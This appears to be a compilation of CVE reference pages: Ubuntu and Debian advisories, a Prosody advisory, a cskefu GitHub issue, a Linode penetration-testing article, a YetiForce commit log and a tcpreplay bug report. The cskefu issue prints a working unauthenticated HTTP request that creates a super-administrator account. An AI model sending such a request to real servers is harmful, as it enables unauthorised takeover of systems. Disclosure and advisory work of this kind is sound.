Ubuntu Security Notice 5586-1 - It was discovered that SDL incorrectly handled memory. An attacker could potentially use this issue to cause a denial of service or other unexpected behavior.

    ==========================================================================Ubuntu Security Notice USN-5586-1August 29, 2022libsdl1.2 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:SDL could be made to crash or behave unexpectedly.Software Description:- libsdl1.2: Simple DirectMedia LayerDetails:It was discovered that SDL (Simple DirectMedia Layer) incorrectly handled memory. An attacker could potentially use this issue to causea denial of service or other unexpected behavior.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   libsdl1.2debian                 1.2.15+dfsg1-3ubuntu0.1+esm2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5586-1   CVE-2022-34568

Ubuntu Security Notice USN-5586-1

A flaw was found in python-oslo-utils. Due to improper parsing, passwords with a double quote ( " ) in them cause incorrect masking in debug logs, causing any part of the password after the double quote to be plaintext.

**Name**

CVE-2022-0718

**Source**

CVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, Mageia, GitHub advisories/code/issues, web search, more)

**Vulnerable and fixed packages**

The table below lists information on source packages.

Source Package

Release

Version

Status

python-oslo.utils (PTS)

buster

3.36.5-0+deb10u1

vulnerable

bullseye

4.6.0-2

vulnerable

bookworm, sid

4.12.3-1

fixed

The information below is based on the following data on fixed versions.

Package

Type

Release

Fixed Version

Urgency

Origin

Debian Bugs

python-oslo.utils

source

(unstable)

4.10.1-1

**Notes**

\[bullseye\] - python-oslo.utils <no-dsa> (Minor issue)  
https://bugzilla.redhat.com/show\_bug.cgi?id=2056850  
https://bugs.launchpad.net/oslo.utils/+bug/1949623  
Fixed by: https://opendev.org/openstack/oslo.utils/commit/6e17ae1f7959c64dfd20a5f67edf422e702426aa (4.12.1)  
Fixed by: https://opendev.org/openstack/oslo.utils/commit/5ce8a7f0f8ecec7a85a23ec3d7a7fb1cad14ceba (4.10.1)

CVE-2022-0718: CVE-2022-0718

Schroot before 1.6.13 had too permissive rules on chroot or session names, allowing a denial of service on the schroot service for all users that may start a schroot session.

\[Date Prev\]\[Date Next\] \[Thread Prev\]\[Thread Next\] \[Date Index\] \[Thread Index\]

*   _To_: debian-security-announce@lists.debian.org
*   _Subject_: \[SECURITY\] \[DSA 5213-1\] schroot security update
*   _From_: Salvatore Bonaccorso <carnil@debian.org\>
*   _Date_: Thu, 18 Aug 2022 11:57:49 +0000
*   _Message-id_: <\[🔎\] E1oOe9l-0005Q6-PA@seger.debian.org\>
*   _Reply-to_: debian-security-announce-request@lists.debian.org

\-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-5213-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
August 18, 2022                       https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : schroot
CVE ID         : CVE-2022-2787

Julian Gilbey discovered that schroot, a tool allowing users to execute
commands in a chroot environment, had too permissive rules on chroot or
session names, allowing a denial of service on the schroot service for
all users that may start a schroot session.

Note that existing chroots and sessions are checked during upgrade, and
an upgrade is aborted if any future invalid name is detected.

Problematic session and chroots can be checked before upgrading with the
following command:

  schroot --list --all | LC\_ALL=C grep -vE '^\[a-z\]+:\[a-zA-Z0-9\]\[a-zA-Z0-9\_.-\]\*$'

See

  <https://codeberg.org/shelter/reschroot/src/tag/release/reschroot-1.6.13/NEWS#L10-L41\>

for instructions on how to resolve such a situation.

For the stable distribution (bullseye), this problem has been fixed in
version 1.6.10-12+deb11u1.

We recommend that you upgrade your schroot packages.

For the detailed security status of schroot please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/schroot

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmL+KGJfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND
z0QPdw/7BxDIMRgoa6zm6iTUvN/hcaim3Z1SJ/ZQhAaKtdU1RtqqlOz/BcQiovrZ
6xfl+Ss8kWQRjuqmR2G30tnLY2nW992vNw5PhQl/mlC4NHkFZIySPNQioAuesiF1
jp0iAvTwDGyHsrZmRdPIP3qB+PwycKnK57dq5FZizS9UNs7VYMLFDwXRk0XmhtwV
F1U8JxX57cfPtxFspoIWEGBa8yuD4IWR/UDzd/taWd4LspB1K2gyEfN2uacvGGwl
UGu2/hjAGOQwIlSvRHpuYlgb4FZCM7v2hQNeb0okIOQb+Id0g1kqxVuAdP03GrTp
s/5B+cUh9IFG2fEccOgB5YUz5T5p9NUD2CgccCa3GjXrsDg8qpig5RCVC5KShvYF
9JHcl6l09LQVZdVtGpJKVIpCyrGjLEKUpwsHZPbDs3/r4UkL8Hj7H4Us4d1dN1bB
vtjaxPJ2uCzlEXhc6bzTV6dLLUj0qmO8pxAIoOce9MI3GVIUTMPr7RnRYMewN4Re
++mJRLSEQNOpcg9YOfLh5eVr/RB21ZuqI+9/N0OzJ9oHvnSyuegKzCzJV6EsTsjF
vKnpy7Pb6agPb+M3GW7TfWuftvNbtnmsyM942OgeqYl/jvK0lvRaNLyJIi/FYry0
t3mmo/QsdgBVua4yfIragbUwBk3mcAnMvhivOJFJoBSrigfUErg=
=Gh4e
-----END PGP SIGNATURE-----

**Reply to:**

*   debian-security-announce@lists.debian.org
*   Salvatore Bonaccorso (on-list)
*   Salvatore Bonaccorso (off-list)

*   Prev by Date: **\[SECURITY\] \[DSA 5212-1\] chromium security update**
*   Next by Date: **\[SECURITY\] \[DSA 5214-1\] kicad security update**
*   Previous by thread: **\[SECURITY\] \[DSA 5212-1\] chromium security update**
*   Next by thread: **\[SECURITY\] \[DSA 5214-1\] kicad security update**
*   Index(es):
    *   **Date**
    *   **Thread**

CVE-2022-2787: [SECURITY] [DSA 5213-1] schroot security update

It was discovered that an internal Prosody library to load XML based on libexpat does not properly restrict the XML features allowed in parsed XML data. Given suitable attacker input, this results in expansion of recursive entity references from DTDs (CWE-776). In addition, depending on the libexpat version used, it may also allow injections using XML External Entity References (CWE-611).

Prosody XMPP server advisory 2022-01-13 (Remote Denial of Service)

Project

Prosody XMPP server

URL

https://prosody.im/

Date

2022-01-13

**References**

*   Advisory (HTML): https://prosody.im/security/advisory\_20220113/
*   Advisory (text): https://prosody.im/security/advisory\_20220113.txt
*   Link to patch: https://prosody.im/security/advisory\_20220113/1.patch
*   Instructions for testing a deployment (will only be published a few days after this announcement): https://prosody.im/security/advisory\_20220113/instructions.txt

This advisory details a new security vulnerability discovered in the Prosody.im XMPP server software. A fix for this issue is available in Prosody 0.11.12, we advise everyone affected to upgrade.

**Unauthenticated Remote Denial of Service Attack in the WebSocket interface**

CVE

CVE-2022-0217

CVSS

7.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:X/RC:C/CR:X/IR:X/AR:X/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:N/MI:N/MA:H)

CWEs

CWE-776, CWE-20, possibly CWE-611

Affected versions

All versions with support for WebSockets

Fixed versions

0.11.12

**Description**

It was discovered that an internal Prosody library to load XML based on libexpat does not properly restrict the XML features allowed in parsed XML data. Given suitable attacker input, this results in expansion of recursive entity references from DTDs (CWE-776). In addition, depending on the libexpat version used, it may also allow injections using XML External Entity References (CWE-611). The Prosody team did not evaluate if and which versions are affected by external entity reference expansion.

The internal prosody API was meant for local access of trusted XML data, but has since started to be used for network-facing applications. An audit of usages of this API in prosody code revealed that it is used by the WebSockets module, which allows to use XMPP over WebSockets.

As the WebSockets module needs to parse XML in order to start a session before authentication, the lack of restriction of available XML features can be used in a Billion Laughs Attack in order to cause excessive resource consumption and denial of service. Because Prosody does not yield control to other connections while processing a fully received WebSocket frame, this also results in Denial of Service.

This internal API is _not_ used to handle XML on normal XMPP connections or the BOSH interface, which are hence not affected by this vulnerability.

**Affected configurations**

All Prosody servers with WebSockets enabled and the WebSockets endpoint exposed directly to any untrusted party are affected.

**Mitigating factors**

WebSockets are not enabled by default.

**Workaround**

**The recommended mitigation is to upgrade to Prosody 0.11.12, released on 2022-01-13.** Follow the manual patching instructions only if you cannot immediately upgrade.

This advisory has a patch attached, it can be applied to any Prosody installation from the 0.11 series. The patch is already applied in 0.11.12. If the patch is applied manually and your Prosody installation is managed by a package manager (such as apt or dnf), a future update will revert the change.

To do so, open a normal shell on the server and locate the file xml.lua. It should exist in a directory structure util/xml.lua.

On Debian, it is found in

    /usr/lib/prosody/util/xml.lua

on 0.11.x or

    /usr/share/lua/5.1/prosody/util/xml.lua

on trunk

Navigate to the directory containing the xml.lua file and apply the attached patch using patch -p2 < 1.patch.

*   Link to patch: https://prosody.im/security/advisory\_20220113/1.patch

Now restart Prosody. There is no known-to-be-safe way to reload the util/xml.lua file without a complete Prosody restart.

After the restart, this vulnerability is fixed.

If neither patching nor upgrading is an option, it is possible to unload the websocket module on Prosody trunk using:

    prosodyctl shell module unload websocket

On 0.11.x and earlier, you need to

*   use module:unload("websocket") from the telnet console, OR
*   unload the module via an XMPP Ad-Hoc command OR
*   if neither of these online ways are available, remove the module from the configuration and restart prosody.

However, note well that third-party modules may also use the vulnerable internal APIs to parse XML. Unloading websocket does not protect those other modules; only the patch or the upgrade can do that.

**Fix**

This issue is fixed in Prosody 0.11.12 by restricting the available XML features in the internal XML API.

**Attribution**

The issue was discovered during internal code review by Matthew Wild during the development of another feature. The patch was developed by Jonas Schäfer. A proof-of-concept exploit was developed by Jonas Schäfer and Kim Alvefur and will be published soon to allow administrators to check their instances.

**Timeline**

2022-01-10: Discovery of the issue, development of an exploit as well as an initial patch. Sharing of this information with Jitsi and Snikket developers. Heads-up sent to the Snikket group chat.

2022-01-11: Refinement of the patch, release preparation. Heads-up sent to the Prosody group chat. Patch shared confidentially with Jitsi.

2022-01-12: Continued release preparation, notification of distros@.

2022-01-13: Coordinated Snikket and Prosody release with a fix, publication of the advisory.

CVE-2022-0217: Prosody XMPP server advisory 2022-01-13 (Remote Denial of Service)

A flaw was found in the VirGL virtual OpenGL renderer (virglrenderer). The virgl did not properly initialize memory when allocating a host-backed memory resource. A malicious guest could use this flaw to mmap from the guest kernel and read this uninitialized memory from the host, possibly leading to information disclosure.

**Name**

CVE-2022-0175

**Description**

memory initialization issue in vrend\_resource\_alloc\_buffer() can lead to info leak

**Source**

CVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, Mageia, GitHub advisories/code/issues, web search, more)

**Vulnerable and fixed packages**

The table below lists information on source packages.

Source Package

Release

Version

Status

virglrenderer (PTS)

buster

0.7.0-2

fixed

bookworm, sid, bullseye

0.8.2-5

fixed

The information below is based on the following data on fixed versions.

Package

Type

Release

Fixed Version

Urgency

Origin

Debian Bugs

virglrenderer

source

(unstable)

(not affected)

**Notes**

\- virglrenderer <not-affected> (Introduced in 0.9.0 with refactor)  
https://bugzilla.redhat.com/show\_bug.cgi?id=2039003  
https://gitlab.freedesktop.org/virgl/virglrenderer/-/merge\_requests/654  
Code refactored in https://gitlab.freedesktop.org/virgl/virglrenderer/-/commit/7899e057327848300b18d8f03aa3789e00ed0221 (0.9.0)  
Fixed by: https://gitlab.freedesktop.org/virgl/virglrenderer/-/commit/b05bb61f454eeb8a85164c8a31510aeb9d79129c

CVE-2022-0175: CVE-2022-0175

Insecure permissions in cskefu v7.0.1 allows unauthenticated attackers to arbitrarily add administrator accounts.

**概述**

存在添加管理员接口，调用该接口时没有对当前用户进行校验，导致未登录状态下可添加管理员账户。  
There is an interface to add an administrator. When calling this interface, the current user is not verified, so that an administrator account can be added when not logged in.

**数据包（payload）：**

GET /addAdmin?username\=admin666&password\=admin666123&email\=admin666@admin6666.com&mobile\=17777777776&superadmin\=true HTTP/1.1
Host: localhost
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade\-Insecure\-Requests: 1
Sec\-Fetch\-Dest: document
Sec\-Fetch\-Mode: navigate
Sec\-Fetch\-Site: none
Sec\-Fetch\-User: ?1
Cache\-Control: max\-age\=0

\*\* 测试截图（Test screenshot）： \*\*  

根据给出的URL  
According to the given URL  
http://localhost/?schema=http&port=80&hostname=localhost&subtype=user&maintype=apps&typename=methodName&orgi=cskefu&webimport=8036&sessionid=f8dbdd6d51dd44788ccad36c02e7958b&models=cca&models=chatbot&models=report&models=entim&models=contacts&ip=172.18.0.1&userExpTelemetry=on

跳转至管理界面  
Jump to the management interface  

**漏洞分析（Vulnerability analysis）**  
漏洞源码（Vulnerability source code）：

 @RequestMapping("/addAdmin")
    @Menu(type = "apps", subtype = "user", access = true)
    public ModelAndView addAdmin(HttpServletRequest request, HttpServletResponse response, @Valid User user) {
        String msg = "";
        msg = validUser(user);
        if (StringUtils.isNotBlank(msg)) {
            return request(super.createView("redirect:/register.html?msg=" + msg));
        } else {
            user.setUname(user.getUsername());
            user.setAdmin(true);
            if (StringUtils.isNotBlank(user.getPassword())) {
                user.setPassword(MainUtils.md5(user.getPassword()));
            }
            user.setOrgi(super.getOrgi());
            userRepository.save(user);
        }
        ModelAndView view = this.processLogin(request, user, "");
        return view;
    }

    private String validUser(User user) {
        String msg = "";
        User tempUser = userRepository.findByUsernameAndDatastatus(user.getUsername(), false);
        if (tempUser != null) {
            msg = "username\_exist";
            return msg;
        }
        tempUser = userRepository.findByEmailAndDatastatus(user.getEmail(), false);
        if (tempUser != null) {
            msg = "email\_exist";
            return msg;
        }
        tempUser = userRepository.findByMobileAndDatastatus(user.getMobile(), false);
        if (tempUser != null) {
            msg = "mobile\_exist";
            return msg;
        }
        return msg;
    }

addAdmin接口未进行权限校验，未登录状态可直接调用  
The addadmin interface does not perform permission verification, and can be called directly in the unregistered state

增加用户前，判断传入的用户是否有效  
Before adding users, judge whether the incoming users are valid  

为了顺利到达最后一个return，传入的username，email，mobile都必须为数据库中的唯一值  
n order to successfully reach the last return, the username, email and mobile passed in must be unique values in the database  

当返回的msg为空时，我们就可以继续增加用户的操作，且将添加的用户设置为管理员  
When the returned MSG is empty, we can continue to add users and set the added users as administrators  

**操作系统**

*   macOS or Mac OSX
*   Windows
*   Linux(Debian, CentOS, Ubuntu, etc.)

**代码版本**

代码版本 <= 7.0.1

**祝福与不祝福**

春松客服之所以开源，是基于这样一种信念：爱人也是爱己，利他也是利己。  
对人和人美好关系的向往，对人潜力的信任。让我们相信因春松客服而受益的人，会回报给春松客服开源社区，我们所有贡献者基于共赢的信念合作。  
回报方式包括：提交 PR、购买春松客服相关的付费产品和服务等。

因春松客服受益，而不回报开源社区的用户，我们不欢迎使用春松客服：我们开源并不是为了你们，你们是不被祝福的。

**Open Source for the World**

CVE-2022-36521: 【安全漏洞】前台未授权增加管理员账号 · Issue #724 · chatopera/cskefu

Alternative cloud providers offer streamlined capabilities for penetration testing, including more accessible tools, easy deployment, and affordable pricing.

Cloud data breaches are on the rise. In 2022, 45% of organizations reported a breach or compliance audit failure, representing a 5% increase from the year before. And just 11% reported that more than 80% of their sensitive data in the cloud is encrypted. With the help of red-team penetration testing, infosec developers have the ability to patch vulnerabilities before they reach end users. And as attacks continue to expand, red-team activities in the cloud are an absolute must for most organizations, and take up a growing chunk of infosec developers' time.

As a crucial layer of protection for businesses, infosec teams need technologies that make their work easier. Yet today, many cloud providers make security complex by overcomplicating either the deployment of required infrastructure or the pricing structure. This has to change. It's time for cloud providers to empower infosec developers with the right tools, platforms, and pricing to support essential testing and security work. Or risk breaches that cost money, reputation, and time.

**Companies Deserve Full Capabilities and Affordable Costs**

Security starts with the right strategy and tool set. When it comes to red-team activities, Kali is a top choice. A lightweight Linux distribution, Kali is open source and Debian-based, with a full suite of security testing tools. But Kali can be hard to use on some of the most popular cloud providers, like Amazon Web Services (AWS).

For one thing, deploying Kali Linux onto a cloud instance can be tedious and time consuming, especially if installing directly from an ISO using workarounds or exporting from a local VM. For example, though a penetration tester can set up a Kali Linux instance on Amazon's cloud, it's only available as an Amazon Machine Image (AMI) that runs Kali Linux on the Amazon Marketplace. This image doesn't include the full range of Kali's capabilities.

In addition to a challenging manual setup process, companies also need to grapple with pricing complexity — a problem that doesn't just affect finance teams but trickles down to developers too. Depending on the scope, size, and thoroughness of the engagement, penetration testing may require many instances and significant amounts of egress. On major cloud providers, these needs can run up a large bill. On top of that, pricing complexity may make these costs difficult to accurately estimate, placing an unfair responsibility on infosec professionals, developers, and business owners that may be expected to foresee (and prevent) high price tags.

While enterprise companies may not be concerned about these factors — they may have massive infosec teams to handle setup and deep pockets to deal with costs — small businesses will likely be more wary. As they grapple with a talent shortage and relatively tight budgets, they need partners that can support them in a different, more holistic way. Enter alternative cloud providers.

Though Kali is widely available, deploying it with a partner that offers deeper functionality and more thorough support at a fair cost is simply more practical, especially for SMBs. For security professionals in the cloud space to get the most of Kali, it must be offered as an officially supported distribution that can easily be deployed on any cloud instance. This ensures that the full range of testing opportunities and configurations supported by Kali Linux can easily run in the cloud. Akamai Linode offers Kali this way, giving end users access not only via the distribution but also as an app in Linode's marketplace. Another key differentiator is that alternative providers typically offer a higher level of support than other providers, helping SMBs tackle that tough initial setup, often with no added costs.

Pricing in general, not just for support, is more accessible through alternative providers as well. These players not only have more predictable, transparent costs thanks to flat rates, but some — like Linode — have generous transfer allowances and comparatively low overage costs. That's game-changing for penetration testers that deal with plenty of egress. Without worry about incurring significant extra costs, they can freely run the testing they need to protect their organizations.

**Consider Alternative Cloud Providers for Security Testing**

Every organization using cloud, no matter how small, should be doing security testing: cloud misconfiguration is the initial attack vector for 15% of all data breaches. And with breaches costing companies as much as $4 million dollars, they simply can't afford the risk.

As threats continue to grow, thorough and well-honed penetration testing is more important now than ever. And infosec teams need support. Let's arm these vital teams with key tools, easier deployment, and clearer, more affordable pricing schemes.

**About the Author**

    

Billy Thompson is a Solutions Engineering Manager on Akamai, Linode Compute, helping customers design portable architectures, and deploy them at scale for technical and business teams. Billy holds a degree in information security and has a special interest in IaC, Kubernetes, big data engineering, and Python and Rust programming languages. He is a longtime Arch Linux user and vegan, and never knows which to tell people first. Outside of work, he studies jujitsu, muay thai, and boxing. He also volunteers at his home for fostering and acclimating rescue dogs.

For Penetration Security Testing, Alternative Cloud Offers Something Others Don't

Cross-site Scripting (XSS) - Stored in GitHub repository yetiforcecompany/yetiforcecrm prior to 6.4.0.

Permalink

Browse files

YetiForce CRM ver. 6.4.0 (#16359)

\* Added improvements in record collector

\* Integration with UaYouControl.php (#16293)

Co-authored-by: Mariusz Krzaczkowski <m.krzaczkowski@yetiforce.com>

\* Integration with UaYouControl.php (#16293)

\* Add external link to NoBrregEnhetsregisteret. (#16292)

\* Add external link to NoBrregEnhetsregisteret. #16292

\* Add NorthData to RecordCollectors. (#16278)

\* Add NorthData to RecordCollectors.

\* Change docs.

Co-authored-by: Mariusz Krzaczkowski <m.krzaczkowski@yetiforce.com>

\* Fix #16311

\* Added conditions wizard for 'Update related record' workflow action

\* Add NorthData to RecordCollectors. (#16278)

\* Code improvements

\* Added improvements in record collector

\* Zefix integraion \[in progress\] (#16281)

\* Zefix integraion \[in progress\]

\* ChZefix integration.

Co-authored-by: Mariusz Krzaczkowski <m.krzaczkowski@yetiforce.com>

\* Improved workflow action

\* Added improvements in record collector

\* Improvements in the store

\* Update RecordCollector tests

\* Code improvements

\* Improved ConfReport

\* languages/en-US/Other/RecordCollector.json

\* Improved change module type

\* Improved default dashboard in api portal

\* Fix Send PDF workflow task

\* Improved default dashboard in api

\* Fixed attachments in 'Emails to send' panel

\* lib\_roundcube 0.3.0 Roundcube Webmail 1.6.0

\* tests

\* tests

\* Update tests.yml

\* Added improvements in record collector

\* tests/setup/dependency.sh

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Code improvements

\* Update dependencies

\* Added minor improvements

\* tests

\* Added improvements in record collector

\* Added improvements in record collector

\* Added minor improvements

\* Added minor improvements

\* Added minor improvements

\* Improved import file button

\* Improved imap connection

\* Fix #16317 - list view entries count

\* Added minor code improvements

\* Improved menu items

\* Added improvements in record collector

\* Fix gantt view (#15772)

\* Added improvements in record collector

\* Added improvements in record collector

\* Added improvements in record collector

\* Updated graphics in store

\* Update install translations

\* Update fonts

\* Improved OSSMail template

\* Updated graphics in store

\* Update fonts

\* tests

\* tests Validator

\* Update icons

\* Improved widgets permissions (#15613)

\* Increase scrolling speed (#15031)

\* Added tracking to media management

\* Added improvements in record collector

\* Added improvements in record collector

\* Added improvements in record collector

\* Added minor code improvements

\* tests

\* Added minor code improvements

\* Fixed #15164 (#16319)

\* Some changes in Import module (#16318)

\* Code formatting

\* Added improvements in record collector

\* Change the library "sonata-project / google-authenticator" to "pragmarx/google2fa"

\* Update dependencies

\* Update dependencies

\* Updated \*.min and \*.map files

\* Change the library "sonata-project / google-authenticator" to "pragmarx/google2fa"

\* Added minor improvements in Composer::install

\* Update dev dependency

\* Added dropdown button to record collectors (#16322)

\* Corrected  Record collectors table width (#16323)

\* Fixed #15183 modulesMapRelatedFields don\`t work correct for multipicklist

\* Added minor improvements in Credits

\* Fix edit view header links

\* Improved Inventory panel and PDF widget

\* Added improvements in record collector

\* Added improvements in record collector

\* Update install translations

\* #16282 Improved the handler from getting coordinates to the map

\* Added minor code improvements

\* Fixed getting reference module in inventory name field (#16329)

\* Missing icons update

\* Improved tree field type

\* Improved tests and some code

\* Fix tree field type

\* Fix scheme for tree data table

\* Improved switch users

\* Improved YetiForce CLI

\* \[PROD\](renovate) Update dependency github/super-linter to v4.9.6 (#16324)

Co-authored-by: renovate\[bot\] <29139614+renovate\[bot\]@users.noreply.github.com>

\* Bump giggsey/libphonenumber-for-php from 8.12.52 to 8.12.53 (#16331)

Bumps \[giggsey/libphonenumber-for-php\](https://github.com/giggsey/libphonenumber-for-php) from 8.12.52 to 8.12.53.
- \[Release notes\](https://github.com/giggsey/libphonenumber-for-php/releases)
- \[Commits\](giggsey/libphonenumber-for-php@8.12.52...8.12.53)

---
updated-dependencies:
- dependency-name: giggsey/libphonenumber-for-php
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot\[bot\] <support@github.com>

Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>

\* Improved switch users

\* Improved switch users

\* Unused code has been removed

\* Fix tree field type

\* Added improvements in record collector

\* Improved integration with DAV

\* Improved conditions wizard for 'Update related record' workflow action

\* Fixed focus to search text field when click on select2 drop down in modal window

\* Added improvements in record collector

\* Added minor code improvements

\* Improved ConfReport

\* Improved .htaccess

\* Added minor code improvements

\* Improved ConfReport

\* Fix icon on tree field type and change icon management view

\* Removed unused code. "Is added" - condition in workflows (#16321)

\* Correct setting of check boxes of Inventory boolean fields depending on their values. (#16326)

\* Update Inventory.js
Now the check-boxes of Inventory boolean fields will be set correctly regarding to their content.

\* README.md (#16332)

\* Improve inventory auto fill

\* Improved getting data from smtp (#16334)

\* Fixed #13136 (#16335)

\* Improved DB structure for map table cache

\* Improved updating payment status (#16327)

\* Improved updating payment status

\* Corrected translation (#16336)

\* Removed translation (#16337)

\* A functionality has been added to unlock e-mail accounts

\* Fix #13486

\* Update dependencies

\* mbstring.func\_overload

\* Added priority to CalendarActivities and OverdueActivities dashboard … (#16276)

\* Added priority to CalendarActivities and OverdueActivities dashboard widgets

\* Added improvement

\* Hidden icon for previewing replies in comments (#16339)

\* The display of the multi email field has been improved

\* Added working time counter widget. (#16316)

\* Added working time counter widget.

\* Added translation

\* Added improvements

\* Removed varialbe

\* Corrected comment

\* Added title to buttons

\* Added type to variable

\* Removed redundant characters

\* Added working time counter widget. #16316

\* Added minor improvements

\* Improoved dashboard titles

\* Updated \*.min and \*.map files

\* Added minor improvements in languages

\* Updated translation

\* Improvements have been added to the integration with WAPRO ERP

\* Update install translations

\* Update translations

\* Update translations

\* Added improvements in record collector

\* Added improvements in record collector

\* Improved input data cleanup

\* Improved RSS

\* Improved Rss

\* Update all Yarn dependencies (2022-08-15) (#16344)

Co-authored-by: depfu\[bot\] <23717796+depfu\[bot\]@users.noreply.github.com>

\* Added improvements in record collector

\* Improvements in the mechanism of generating PDF files

\* YetiForcePDF update v0.1.40 & Update dependencies

\* Improved some config templates

\* Added minor improvements

\* Remove unnecessary code

\* .github/workflows/actions.yml

\* .github/workflows/actions.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Improved Db importer/updater

\* Added buttons to the Working hours counter widget (#16340)

\* Added buttons to the Working hours counter widget

\* Added translations

\* Improved widget

\* Added button lock when starting timing

\* Update translations

\* Added missing translation

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Added missing translation

\* .github/workflows/tests.yml

\* Removed Translation (#16347)

Co-authored-by: Radosław Skrzypczak <r.skrzypczak@yetiforce.com>

\* Update install translations

\* Added minor improvement in get actual version of PHP

\* Update install translations

\* Updated \*.min and \*.map files

\* Redundant code has been removed

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Improved RSS

\* Added improvements

\* Update DEV dependencies

\* Fix Completions initialization in comments widget (#16348)

\* Update fonts

\* Fixed sending files in API for PUT method

\* Update DEV dependencies

\* Improved valid of time in Business Hours (#16351)

\* Improved executing workflow when an unsupported operator is selected (#16352)

\* Improved executing workflow when an unsupported operator is selected

\* Improved getting translation (#16350)

\* Improved Importer

\* Improved working time counter widget

\* Improved api

\* Expansion of the tests

\* Expansion of the tests

\* tests

\* Update DEV dependencies

\* Improved Rss

\* tests

\* Value display secured

\* Added improvements

\* Improved index name

\* Improved validation of quantity field (#16355)

\* Improved validation of quantity field

\* Improved code

\* Add missing picklist dependencies

\* Added  validation whether at least one business day has been selected in the Business hours module (#16356)

\* Compile js

\* Moved swagger file

\* Improved swagger generating functions

\* Added minor improvements

\* Fixed issue with date format

\* Added improvements

\* Fixed a bug when selecting all users in the calendar quick edit view (#16357)

\* Improved swagger generating functions

\* Added improvements

\* Added improvements

\* Added improvements

\* Improved Address Search panel

\* Improved Emails to send panel

\* Fix action name

\* Fix description in docBlock

\* tests/Settings/ApiAddress.php

\* Compile js

\* tests/Settings/ApiAddress.php

\* tests/Settings/ApiAddress.php

\* Remove html unnecessary class

\* Fixed #14266 (#16349)

\* \[PROD\](renovate) Update debian Docker tag to v11 (#16341)

Co-authored-by: renovate\[bot\] <29139614+renovate\[bot\]@users.noreply.github.com>

\* Improved anonymization

\* Added improvements

\* Update install translations

\* Improved config class

\* Added improvements

\* Improved generatedtype for some fields

\* Fixed #15631 (#16358)

\* Added improvements

\* Improved block sequence

\* 6.4.0

Co-authored-by: rembiesa <103192653+rembiesa@users.noreply.github.com>
Co-authored-by: Radosław Skrzypczak <r.skrzypczak@yetiforce.com>
Co-authored-by: Adrian Koń <a.kon@yetiforce.com>
Co-authored-by: bmankowski <bmankowski@gmail.com>
Co-authored-by: Arek Solek <arkadiusz\_s9887@wp.pl>
Co-authored-by: renovate\[bot\] <29139614+renovate\[bot\]@users.noreply.github.com>
Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>
Co-authored-by: Jared Ramon Elizan <elizanjaredr@gmail.com>
Co-authored-by: depfu\[bot\] <23717796+depfu\[bot\]@users.noreply.github.com>

*   Loading branch information

CVE-2022-1340: YetiForce CRM ver. 6.4.0 (#16359) · YetiForceCompany/YetiForceCRM@2c14baa

The component tcprewrite in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in get_l2len_protocol at common/get.c:344. NOTE: this is different from CVE-2022-27941.

You are opening a _bug report_ against the Tcpreplay project: we use  
GitHub Issues for tracking bug reports and feature requests.

If you have a question about how to use Tcpreplay, you are at the wrong  
site. You can ask a question on the tcpreplay-users mailing list  
or on Stack Overflow with \[tcpreplay\] tag.  
General help is available here.

If you have a build issue, consider downloading the latest release

Otherwise, to report a bug, please fill out the reproduction steps  
(below) and delete these introductory paragraphs. Thanks!

**Describe the bug**  
A clear and concise description of what the bug is.  
There is a heap-overflow bug in get\_ipv6\_next. Different from #716 (The crash point is in line 322, ntohs(eth_hdr->ether_type);), this bug is triggered in line 344 (pktdata[l2_net_off] >> 4).

**To Reproduce**  
Steps to reproduce the behavior:

1.  export CC=clang && export CFLAGS="-fsanitize=address -g"
2.  ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
3.  tcpprep --auto=bridge --pcap=POC --cachefile=/dev/null

**Expected behavior**  
A clear and concise description of what you expected to happen.  
The program does not crash.

**Screenshots**  
If applicable, add screenshots to help explain your problem.  

**System (please complete the following information):**

*   OS: Debian
*   OS version: buster
*   Tcpreplay Version: 09f0774

**Additional context**  
Add any other context about the problem here.  
**POC**  
poc.zip

CVE-2022-37048: [Bug] heap-overflow in get.c:344 · Issue #735 · appneta/tcpreplay

